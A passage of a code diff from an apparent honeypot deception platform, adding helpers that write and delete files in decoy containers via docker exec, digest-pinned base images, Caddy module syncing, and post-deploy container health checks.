        # No ssh service container: fall back to the decky's base container.
        return f"decnet_t_{topology_id[:8]}_{decky_name}"
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
|
async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Resolve the docker container name for *decky_name*.

    Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
    without consulting *repo*; existence of the decky is not checked here.

    Topology path: hydrates the topology through
    ``decnet.topology.persistence.hydrate``, finds the first decky whose
    name matches, and delegates to :func:`resolve_topology_container` with
    that decky's ``services`` list (empty when absent).

    Args:
        repo: Repository handle passed straight through to ``hydrate``.
        decky_name: Name of the decky to resolve.
        topology_id: Topology to search, or ``None`` for a fleet decky.

    Returns:
        The docker container name.

    Raises:
        LookupError: When ``topology_id`` is set but the topology is not
            found, or no decky in it is named *decky_name*.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"

    # Deferred import: only the topology path needs the persistence layer.
    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        raise LookupError(f"topology {topology_id!r} not found")

    def _name_of(entry: Any) -> Any:
        # The name in ``decky_config`` wins over the row-level ``name``.
        return (entry.get("decky_config") or {}).get("name") or entry.get("name")

    match = next(
        (entry for entry in topology["deckies"] if _name_of(entry) == decky_name),
        None,
    )
    if match is None:
        raise LookupError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return resolve_topology_container(
        topology_id, decky_name, match.get("services") or [],
    )
|
||||||
124
decnet/decky_io/write.py
Normal file
124
decnet/decky_io/write.py
Normal file
@@ -0,0 +1,124 @@
|
|||||||
|
"""``docker exec``-driven file write/delete inside a decky container.
|
||||||
|
|
||||||
|
The write path streams a base64-encoded payload over stdin to
|
||||||
|
``base64 -d`` inside the container, so binary content of any size up
|
||||||
|
to docker's stream limits is safe — interpolating bytes into argv
|
||||||
|
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import shlex
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
|
||||||
|
log = get_logger("decky_io.write")
|
||||||
|
|
||||||
|
_DOCKER = "docker"
|
||||||
|
_DEFAULT_TIMEOUT = 8.0
|
||||||
|
|
||||||
|
|
||||||
|
def _dirname(path: str) -> str:
    """Return the directory part of a ``/``-separated *path*.

    Everything before the last ``/`` is returned. When there is no ``/``
    at all, or the only ``/`` is the leading one, the result is ``"/"``.
    """
    parent, slash, _leaf = path.rpartition("/")
    if slash and parent:
        return parent
    return "/"
|
||||||
|
|
||||||
|
|
||||||
|
async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and return ``(returncode, stdout, stderr)``.

    Args:
        argv: Program and arguments, executed without a shell.
        stdin_bytes: Bytes fed to the child's stdin. When ``None`` no stdin
            pipe is opened.
        timeout: Seconds to wait for the child to finish.

    Returns:
        A ``(returncode, stdout, stderr)`` tuple with both streams decoded
        as UTF-8 (undecodable bytes replaced). Two synthetic results exist:

        * ``(127, "", "argv[0] not found: ...")`` when the executable
          cannot be found.
        * ``(124, "", "timeout")`` when the child did not finish within
          *timeout*; the child is killed and reaped before returning.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # The child exited on its own between the timeout and the kill.
            pass
        # Reap the killed child so it does not outlive this call with its
        # pipe transports still open. The wait is bounded so that a child
        # whose pipes are held open elsewhere cannot stall the caller.
        try:
            await asyncio.wait_for(proc.wait(), timeout=2.0)
        except asyncio.TimeoutError:
            pass
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Write *content* to *path* inside *container* via ``docker exec``.

    A single ``sh -c`` pipeline runs in the container, each step gated on
    the previous one with ``&&``: ``mkdir -p`` of the parent directory,
    ``base64 -d`` of stdin into *path*, ``chmod`` to *mode*, and, when
    *mtime* is given, ``touch -d`` to backdate the file.

    Args:
        container: Docker container name.
        path: Destination path inside the container. An empty path is
            rejected without invoking docker.
        content: Raw bytes to write; sent base64-encoded over stdin.
        mode: Permission bits, rendered in octal for ``chmod``.
        mtime: Optional timestamp, converted to UTC and passed to
            ``touch -d`` as ``YYYY-MM-DD HH:MM:SS UTC``.
        timeout: Seconds allowed for the whole ``docker exec`` call.

    Returns:
        ``(True, None)`` on success. Otherwise ``(False, error)`` where
        *error* is the stripped stderr cut to 256 characters, or
        ``"rc=<n>"`` when stderr was empty.
    """
    if not path:
        return False, "empty path"

    payload = base64.b64encode(content)
    target = shlex.quote(path)
    steps = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {target}",
        f"chmod {mode:o} {target}",
    ]
    if mtime is not None:
        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        steps.append(f"touch -d {shlex.quote(stamp)} {target}")

    rc, _out, stderr = await _run(
        [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)],
        stdin_bytes=payload,
        timeout=timeout,
    )
    if rc != 0:
        failure = stderr.strip()[:256] or f"rc={rc}"
        log.warning(
            "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
            container, path, rc, stderr[:120],
        )
        return False, failure
    return True, None
|
||||||
|
|
||||||
|
|
||||||
|
async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Best-effort ``rm -f`` of *path* inside *container*.

    Args:
        container: Docker container name.
        path: Path inside the container to unlink; shell-quoted before use.
        timeout: Seconds allowed for the ``docker exec`` call.

    Returns:
        ``(True, None)`` when the command exits 0. Because ``rm -f`` also
        exits 0 for a file that is already gone, success means "the file is
        not present after this call", not "this call removed it". Otherwise
        ``(False, error)`` with the stripped stderr cut to 256 characters,
        or ``"rc=<n>"`` when stderr was empty.
    """
    rc, _out, stderr = await _run(
        [_DOCKER, "exec", container, "sh", "-c", f"rm -f {shlex.quote(path)}"],
        timeout=timeout,
    )
    if rc != 0:
        return False, stderr.strip()[:256] or f"rc={rc}"
    return True, None
|
||||||
@@ -18,69 +18,86 @@ class DistroProfile:
|
|||||||
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
||||||
|
|
||||||
|
|
||||||
|
# Base images are pinned by digest (sha256) to make `docker pull`
|
||||||
|
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
|
||||||
|
# can't silently swap content under us. The :tag is kept for human
|
||||||
|
# readability; the @sha256 is what Docker actually resolves.
|
||||||
|
# Refresh procedure: `docker pull <tag>` then `docker inspect
|
||||||
|
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
|
||||||
|
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
|
||||||
|
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
|
||||||
|
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
|
||||||
|
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
|
||||||
|
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
|
||||||
|
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
|
||||||
|
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
|
||||||
|
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
|
||||||
|
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
|
||||||
|
|
||||||
|
|
||||||
DISTROS: dict[str, DistroProfile] = {
|
DISTROS: dict[str, DistroProfile] = {
|
||||||
"debian": DistroProfile(
|
"debian": DistroProfile(
|
||||||
slug="debian",
|
slug="debian",
|
||||||
image="debian:bookworm-slim",
|
image=_DEBIAN_BOOKWORM,
|
||||||
display_name="Debian 12 (Bookworm)",
|
display_name="Debian 12 (Bookworm)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="debian:bookworm-slim",
|
build_base=_DEBIAN_BOOKWORM,
|
||||||
),
|
),
|
||||||
"ubuntu22": DistroProfile(
|
"ubuntu22": DistroProfile(
|
||||||
slug="ubuntu22",
|
slug="ubuntu22",
|
||||||
image="ubuntu:22.04",
|
image=_UBUNTU_22_04,
|
||||||
display_name="Ubuntu 22.04 LTS (Jammy)",
|
display_name="Ubuntu 22.04 LTS (Jammy)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="ubuntu:22.04",
|
build_base=_UBUNTU_22_04,
|
||||||
),
|
),
|
||||||
"ubuntu20": DistroProfile(
|
"ubuntu20": DistroProfile(
|
||||||
slug="ubuntu20",
|
slug="ubuntu20",
|
||||||
image="ubuntu:20.04",
|
image=_UBUNTU_20_04,
|
||||||
display_name="Ubuntu 20.04 LTS (Focal)",
|
display_name="Ubuntu 20.04 LTS (Focal)",
|
||||||
hostname_style="generic",
|
hostname_style="generic",
|
||||||
build_base="ubuntu:20.04",
|
build_base=_UBUNTU_20_04,
|
||||||
),
|
),
|
||||||
"rocky9": DistroProfile(
|
"rocky9": DistroProfile(
|
||||||
slug="rocky9",
|
slug="rocky9",
|
||||||
image="rockylinux:9-minimal",
|
image=_ROCKY_9,
|
||||||
display_name="Rocky Linux 9",
|
display_name="Rocky Linux 9",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"centos7": DistroProfile(
|
"centos7": DistroProfile(
|
||||||
slug="centos7",
|
slug="centos7",
|
||||||
image="centos:7",
|
image=_CENTOS_7,
|
||||||
display_name="CentOS 7",
|
display_name="CentOS 7",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"alpine": DistroProfile(
|
"alpine": DistroProfile(
|
||||||
slug="alpine",
|
slug="alpine",
|
||||||
image="alpine:3.19",
|
image=_ALPINE_3_19,
|
||||||
display_name="Alpine Linux 3.19",
|
display_name="Alpine Linux 3.19",
|
||||||
hostname_style="minimal",
|
hostname_style="minimal",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"fedora": DistroProfile(
|
"fedora": DistroProfile(
|
||||||
slug="fedora",
|
slug="fedora",
|
||||||
image="fedora:39",
|
image=_FEDORA_39,
|
||||||
display_name="Fedora 39",
|
display_name="Fedora 39",
|
||||||
hostname_style="rhel",
|
hostname_style="rhel",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
"kali": DistroProfile(
|
"kali": DistroProfile(
|
||||||
slug="kali",
|
slug="kali",
|
||||||
image="kalilinux/kali-rolling",
|
image=_KALI_ROLLING,
|
||||||
display_name="Kali Linux (Rolling)",
|
display_name="Kali Linux (Rolling)",
|
||||||
hostname_style="rolling",
|
hostname_style="rolling",
|
||||||
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
|
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
|
||||||
),
|
),
|
||||||
"arch": DistroProfile(
|
"arch": DistroProfile(
|
||||||
slug="arch",
|
slug="arch",
|
||||||
image="archlinux:latest",
|
image=_ARCH_LATEST,
|
||||||
display_name="Arch Linux",
|
display_name="Arch Linux",
|
||||||
hostname_style="rolling",
|
hostname_style="rolling",
|
||||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||||
),
|
),
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import json
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import time
|
import time
|
||||||
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
|
|||||||
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
||||||
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
||||||
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
||||||
|
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
|
||||||
|
_CADDY_SERVICES = {"http", "https"}
|
||||||
|
|
||||||
|
|
||||||
def _sync_logging_helper(config: DecnetConfig) -> None:
|
def _sync_logging_helper(config: DecnetConfig) -> None:
|
||||||
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
|||||||
shutil.copy2(src, dest)
|
shutil.copy2(src, dest)
|
||||||
|
|
||||||
|
|
||||||
|
def _chown_tree(dest: Path, owner_ref: Path) -> None:
    """Give *dest*, and everything under it, the uid/gid of *owner_ref*.

    Does nothing unless the effective uid is 0. Ownership is changed with
    ``os.lchown``, so a symlink entry is re-owned itself rather than its
    target. Per-entry ``OSError`` is ignored: this is best-effort.

    Args:
        dest: File or directory to re-own. A directory is walked
            recursively.
        owner_ref: Existing path whose uid and gid are copied.
    """
    import os

    if os.geteuid() != 0:
        return

    ref = owner_ref.stat()
    entries = [dest]
    if dest.is_dir():
        # Materialise the walk before changing anything.
        entries.extend(dest.rglob("*"))

    for entry in entries:
        try:
            os.lchown(entry, ref.st_uid, ref.st_gid)
        except OSError:
            continue
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_caddy_modules(config: DecnetConfig) -> None:
    """Mirror ``_caddy_modules/`` into http/https build contexts.

    The xcaddy builder stage in each Dockerfile references
    ``_caddy_modules/decnetfp`` relative to its build context (the
    per-service template dir). Since the canonical source lives one
    level up at ``templates/_caddy_modules/``, it is synced into each
    active http/https build context before compose up.

    For every distinct build context used by a decky's ``http``/``https``
    service:

    * sub-directories of the canonical dir are replaced wholesale
      (``rmtree`` + ``copytree``);
    * plain files are copied only when missing or when their bytes differ;
    * the whole mirrored ``_caddy_modules`` tree, including the directory
      itself, is then handed to the owner of the canonical dir via
      ``_chown_tree`` (a no-op unless running as root).

    Returns silently when the canonical directory does not exist.

    Args:
        config: Deployment config; only ``config.deckies`` and each decky's
            ``services`` are read.
    """
    from decnet.services.registry import get_service

    src_dir = _CANONICAL_CADDY_MODULES_DIR
    if not src_dir.is_dir():
        return

    seen: set[Path] = set()
    for decky in config.deckies:
        for svc_name in decky.services:
            if svc_name not in _CADDY_SERVICES:
                continue
            svc = get_service(svc_name)
            if svc is None:
                continue
            ctx = svc.dockerfile_context()
            if ctx is None or ctx in seen:
                # No build context, or one already synced for another decky.
                continue
            seen.add(ctx)

            dest_dir = ctx / "_caddy_modules"
            dest_dir.mkdir(exist_ok=True)
            try:
                for child in src_dir.iterdir():
                    dest_child = dest_dir / child.name
                    if child.is_dir():
                        if dest_child.exists():
                            shutil.rmtree(dest_child)
                        shutil.copytree(child, dest_child)
                    elif (
                        not dest_child.exists()
                        or dest_child.read_bytes() != child.read_bytes()
                    ):
                        shutil.copy2(child, dest_child)
            finally:
                # Re-own the container directory as well as its children.
                # Leaving ``_caddy_modules`` root-owned after a root run
                # would stop the source owner replacing entries inside it
                # later. Done in ``finally`` so a failed copy does not
                # leave already-copied entries root-owned.
                _chown_tree(dest_dir, src_dir)
|
||||||
|
|
||||||
|
|
||||||
|
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
    """Return ``docker compose ps`` rows for *compose_file* as parsed JSON.

    Used for post-deploy verification: ``compose up -d`` returns 0 as soon
    as containers are *started*, so a service that crashes on boot only
    becomes visible in the ``ps`` output.

    Args:
        compose_file: Compose file handed to ``docker compose -f``; the
            project name is pinned to ``decnet``.

    Returns:
        One dict per container row. An empty list when the ``docker``
        executable is missing, when the command exits non-zero, or when no
        line yields a JSON object. Callers treat an empty list as
        "unverifiable", not as a failure.
    """
    argv = [
        "docker", "compose", "-p", "decnet", "-f", str(compose_file),
        "ps", "--all", "--format", "json",
    ]
    try:
        proc = subprocess.run(  # nosec B603
            argv, capture_output=True, text=True, check=False,
        )
    except FileNotFoundError:
        return []
    if proc.returncode != 0:
        return []

    parsed: list[dict[str, object]] = []
    # Output is parsed one line at a time, so a single undecodable line is
    # skipped instead of discarding the whole result. A line may hold one
    # JSON object or a JSON array of objects; both shapes are accepted.
    for raw in (proc.stdout or "").splitlines():
        text = raw.strip()
        if not text:
            continue
        try:
            decoded = json.loads(text)
        except json.JSONDecodeError:
            continue
        candidates = decoded if isinstance(decoded, list) else [decoded]
        parsed.extend(item for item in candidates if isinstance(item, dict))
    return parsed
|
||||||
|
|
||||||
|
|
||||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||||
import os
|
import os
|
||||||
# -p decnet pins the compose project name. Without it, docker compose
|
# -p decnet pins the compose project name. Without it, docker compose
|
||||||
@@ -393,6 +494,8 @@ def _compose_with_retry(
|
|||||||
console.print(f"[red]{result.stderr.strip()}[/]")
|
console.print(f"[red]{result.stderr.strip()}[/]")
|
||||||
log.error("docker compose %s failed after %d attempts: %s",
|
log.error("docker compose %s failed after %d attempts: %s",
|
||||||
" ".join(args), retries, result.stderr.strip())
|
" ".join(args), retries, result.stderr.strip())
|
||||||
|
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
|
||||||
|
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
|
||||||
raise last_exc
|
raise last_exc
|
||||||
|
|
||||||
|
|
||||||
@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
|
|||||||
_sync_sessrec_sources(config)
|
_sync_sessrec_sources(config)
|
||||||
_sync_auth_helper_sources(config)
|
_sync_auth_helper_sources(config)
|
||||||
_sync_ntlmssp_sources(config)
|
_sync_ntlmssp_sources(config)
|
||||||
|
_sync_caddy_modules(config)
|
||||||
|
|
||||||
compose_path = write_compose(config, COMPOSE_FILE)
|
compose_path = write_compose(config, COMPOSE_FILE)
|
||||||
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
||||||
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
|||||||
)
|
)
|
||||||
raise
|
raise
|
||||||
|
|
||||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
# containers are *started*, so a service that crashes on boot
|
||||||
|
# (port bind failure, bad image, missing dependency) leaves the
|
||||||
|
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||||
|
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||||
|
# container isn't running — operators see real state instead of an
|
||||||
|
# optimistic flag.
|
||||||
|
ps_rows = await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_ps(compose_path),
|
||||||
|
)
|
||||||
|
bad: list[str] = []
|
||||||
|
# Build the per-decky state map. The base container's compose
|
||||||
|
# service name == decky name, which is what we cache on the
|
||||||
|
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||||
|
# don't gate the decky's state — service-level failures are visible
|
||||||
|
# in compose ps separately and don't downgrade the decky as a whole.
|
||||||
|
decky_state_by_name: dict[str, str] = {}
|
||||||
|
for row in ps_rows:
|
||||||
|
state = str(row.get("State", "")).lower()
|
||||||
|
service_name = str(row.get("Service") or "")
|
||||||
|
if service_name and "-" not in service_name:
|
||||||
|
# Plain decky base; cache its docker state.
|
||||||
|
decky_state_by_name[service_name] = state or "unknown"
|
||||||
|
if state and state != "running":
|
||||||
|
name = str(row.get("Name") or row.get("Service") or "?")
|
||||||
|
exit_code = row.get("ExitCode")
|
||||||
|
bad.append(
|
||||||
|
f"{name}={state}"
|
||||||
|
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||||
|
)
|
||||||
|
|
||||||
|
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||||
|
# this, the row stays at the default 'pending' forever and the
|
||||||
|
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||||
|
# actually up.
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||||
|
new_state = "running" if ds == "running" else "failed"
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(
|
||||||
|
decky["uuid"], {"state": new_state},
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if bad:
|
||||||
|
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||||
|
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||||
|
)
|
||||||
|
await transition_status(
|
||||||
|
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||||
|
)
|
||||||
|
log.warning(
|
||||||
|
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||||
|
topology_id, len(bad), reason,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||||
|
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||||
|
|
||||||
|
# Best-effort canary baseline seed across every decky in the
|
||||||
|
# topology. Same resilience contract as the fleet path: failures
|
||||||
|
# surface as state=failed token rows, never abort the deploy.
|
||||||
|
try:
|
||||||
|
from decnet.canary import planter as _canary_planter
|
||||||
|
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@_traced("engine.teardown_topology")
|
@_traced("engine.teardown_topology")
|
||||||
|
|||||||
673
decnet/engine/services_live.py
Normal file
673
decnet/engine/services_live.py
Normal file
@@ -0,0 +1,673 @@
|
|||||||
|
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||||
|
|
||||||
|
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||||
|
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||||
|
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||||
|
orchestration: regenerate the compose file (so future redeploys reflect
|
||||||
|
the change), persist the new ``services`` list, and run the targeted
|
||||||
|
compose command.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||||
|
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||||
|
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||||
|
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||||
|
``decnet-compose.yml``.
|
||||||
|
|
||||||
|
Both publish ``decky.<name>.service.added`` /
|
||||||
|
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||||
|
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import subprocess # nosec B404
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal, Optional
|
||||||
|
|
||||||
|
import anyio
|
||||||
|
|
||||||
|
from decnet.bus import topics
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.services.base import BaseService
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||||
|
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||||
|
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||||
|
# pattern in decnet.canary.planter for the same reason.
|
||||||
|
|
||||||
|
|
||||||
|
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
    """Forward a compose invocation to ``decnet.engine.deployer._compose``.

    This wrapper is a module-level seam so tests can
    ``monkeypatch.setattr(services_live, '_compose', ...)``. The deployer
    is imported at call time rather than at module import, keeping this
    module's import graph light.

    ``compose_file`` is forwarded only when the caller supplied one; when
    it is ``None`` the deployer is called without that keyword at all.
    """
    from decnet.engine.deployer import _compose as _deployer_compose

    forwarded: dict[str, Any] = {"env": env}
    if compose_file is not None:
        forwarded["compose_file"] = compose_file
    _deployer_compose(*args, **forwarded)
|
||||||
|
|
||||||
|
|
||||||
|
def _topology_compose_path(topology_id: str) -> Path:
    """Return the compose-file path the deployer computes for *topology_id*.

    Lazy-import wrapper around
    ``decnet.engine.deployer._topology_compose_path``.
    """
    from decnet.engine.deployer import _topology_compose_path as _deployer_path

    compose_path = _deployer_path(topology_id)
    return compose_path
|
||||||
|
|
||||||
|
|
||||||
|
def _write_topology_compose(hydrated, path: Path) -> Path:
    """Render *hydrated* to *path* via ``decnet.topology.compose``.

    Lazy-import wrapper; returns whatever ``write_topology_compose``
    returns.
    """
    from decnet.topology.compose import write_topology_compose as _render

    written = _render(hydrated, path)
    return written
|
||||||
|
|
||||||
|
|
||||||
|
def _load_state():
    """Return the result of ``decnet.config.load_state()``.

    Lazy-import wrapper. Callers in this module treat a ``None`` result as
    "no fleet state" and otherwise unpack it as ``(config, compose_path)``.
    """
    from decnet.config import load_state as _config_load_state

    loaded = _config_load_state()
    return loaded
|
||||||
|
|
||||||
|
|
||||||
|
def _save_state(config, compose_path) -> None:
    """Hand *config* and *compose_path* to ``decnet.config.save_state``.

    Lazy-import wrapper; the delegate's return value is discarded.
    """
    from decnet.config import save_state as _config_save_state

    _config_save_state(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_compose(config, compose_path) -> None:
    """Hand *config* and *compose_path* to ``decnet.composer.write_compose``.

    Lazy-import wrapper; the delegate's return value is discarded.
    """
    from decnet.composer import write_compose as _composer_write

    _composer_write(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _get_bus():
    """Return the bus object produced by ``decnet.bus.factory.get_bus()``.

    Lazy-import wrapper so the bus factory is only imported when a publish
    actually happens.
    """
    from decnet.bus.factory import get_bus as _factory_get_bus

    bus = _factory_get_bus()
    return bus
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------- swarm propagation helpers ---------------------------
|
||||||
|
#
|
||||||
|
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||||
|
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||||
|
# has no containers; for agent-targeted topologies the master only writes a
|
||||||
|
# compose file the worker never sees. These helpers replay the change to the
|
||||||
|
# worker so the env actually lands.
|
||||||
|
#
|
||||||
|
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||||
